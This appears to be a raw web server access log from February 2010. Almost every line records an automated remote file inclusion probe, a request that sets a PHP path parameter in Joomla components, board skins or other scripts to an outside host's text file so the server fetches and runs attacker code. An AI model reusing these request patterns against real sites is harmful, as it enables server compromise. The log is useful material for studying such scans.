60.251.165.181 - - [07/Feb/2010:06:42:17 -0800] "GET /logs/access_100130.log/solpot.html?body=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:06:42:31 -0800] "GET /logs/access_100129.log/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:06:42:41 -0800] "GET /logs/access_100129.log/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:43:18 -0800] "GET /logs/access_100131.log/index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:45:04 -0800] "GET /logs/access_100131.log/index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [07/Feb/2010:06:45:38 -0800] "GET /logs/access_100202.log//write_comment_update.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:45:40 -0800] "GET /bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:45:40 -0800] "GET /logs/access_100202.log%20%20//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:45:40 -0800] "GET /logs//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:45:51 -0800] "GET /logs/access_100131.log%20%20//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:46:02 -0800] "GET /logs//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:46:02 -0800] "GET /logs/access_100202.log%20%20//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:46:02 -0800] "GET /bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [07/Feb/2010:06:46:05 -0800] "GET /logs/access_100201.log//write_comment_update.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:46:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:46:11 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:46:14 -0800] "GET /logs/access_100131.log%20%20//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:46:15 -0800] "GET /logs/access_100115.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:46:16 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:46:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:46:17 -0800] "GET /logs/access_100115.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:46:20 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:46:20 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:46:20 -0800] "GET /logs/access_100115.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:06:48:01 -0800] "GET /logs/access_100106.log/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:06:48:01 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:06:48:01 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:48:37 -0800] "GET /logs/access_100111.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:48:57 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:48:57 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:48:57 -0800] "GET /logs/access_100111.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [07/Feb/2010:06:49:03 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [07/Feb/2010:06:49:03 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [07/Feb/2010:06:49:05 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [07/Feb/2010:06:49:08 -0800] "GET /index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:49:15 -0800] "GET /logs/access_100127.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [07/Feb/2010:06:49:29 -0800] "GET /logs/access_100110.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:49:57 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:49:57 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:49:57 -0800] "GET /logs/access_100111.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:50:13 -0800] "GET /logs/access_100127.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:06:50:22 -0800] "GET /logs/access_100131.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:06:50:22 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:06:50:22 -0800] "GET /logs/access_100103.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:06:50:22 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:51:20 -0800] "GET /logs/access_100108.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:51:25 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:51:25 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:51:25 -0800] "GET /logs/access_100119.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:51:33 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:51:33 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:51:33 -0800] "GET /logs/access_100119.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:51:33 -0800] "GET /logs/access_100116.log/lostpasswd.php?env[include_prefix]=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:51:33 -0800] "GET /lostpasswd.php?env[include_prefix]=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:51:33 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
74.86.155.18 - - [07/Feb/2010:06:51:34 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:51:35 -0800] "GET /logs/access_100127.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:51:37 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:51:37 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:51:37 -0800] "GET /logs/access_100108.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:51:43 -0800] "GET /logs/access_100127.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:06:51:50 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:06:51:55 -0800] "GET /logs/access_100106.log/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:06:51:56 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:52:00 -0800] "GET /logs/access_100113.log/lostpasswd.php?env[include_prefix]=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:52:45 -0800] "GET /logs/access_100119.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [07/Feb/2010:06:52:48 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [07/Feb/2010:06:52:48 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [07/Feb/2010:06:52:48 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [07/Feb/2010:06:52:49 -0800] "GET /index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:53:34 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:53:34 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:53:39 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [07/Feb/2010:06:55:29 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [07/Feb/2010:06:55:29 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [07/Feb/2010:06:55:29 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [07/Feb/2010:06:55:30 -0800] "GET /index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:56:50 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:57:18 -0800] "GET /logs/access_100111.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:58:06 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:58:06 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:58:06 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:58:31 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:06:58:58 -0800] "GET /logs/access_100129.log/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:07:00:49 -0800] "GET /myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:07:00:49 -0800] "GET /logs/access_091231.log/myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:07:00:49 -0800] "GET /logs/myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:07:00:54 -0800] "GET /logs/access_100129.log/myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
69.174.48.203 - - [07/Feb/2010:07:01:34 -0800] "GET /logs/access_100116.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
69.174.48.203 - - [07/Feb/2010:07:01:34 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
69.174.48.203 - - [07/Feb/2010:07:01:34 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
69.174.48.203 - - [07/Feb/2010:07:01:57 -0800] "GET /logs/access_100112.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:02:27 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:02:27 -0800] "GET /logs/access_100118.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:02:30 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:03:31 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:03:31 -0800] "GET /logs/access_100118.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:03:31 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:04:03 -0800] "GET /logs/access_100108.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:07:05:18 -0800] "GET /logs/access_100203.log HTTP/1.0" 200 1781328 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:05:38 -0800] "GET /logs/access_100108.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:05:53 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:05:54 -0800] "GET /logs/access_100111.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:05:55 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:06:42 -0800] "GET /logs/access_100127.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:07:42 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:07:42 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:07:42 -0800] "GET /logs/access_100114.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:07:08:48 -0800] "GET /logs/access_100106.log/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:07:08:48 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:07:08:48 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:08:49 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:08:49 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:08:49 -0800] "GET /logs/access_100114.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:09:04 -0800] "GET /logs/access_100119.log///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:09:04 -0800] "GET //include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
